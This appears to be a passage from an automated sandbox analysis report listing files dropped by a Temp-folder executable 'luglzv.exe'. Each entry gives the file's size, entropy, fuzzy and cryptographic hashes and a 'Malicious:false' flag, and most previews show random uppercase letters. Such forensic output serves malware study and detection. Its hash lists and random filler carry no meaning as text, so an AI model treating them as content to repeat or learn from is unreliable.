                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):3.514693737970008
                                                                  Encrypted:false
                                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
                                                                  MD5:9E36CC3537EE9EE1E3B10FA4E761045B
                                                                  SHA1:7726F55012E1E26CC762C9982E7C6C54CA7BB303
                                                                  SHA-256:4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
                                                                  SHA-512:5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
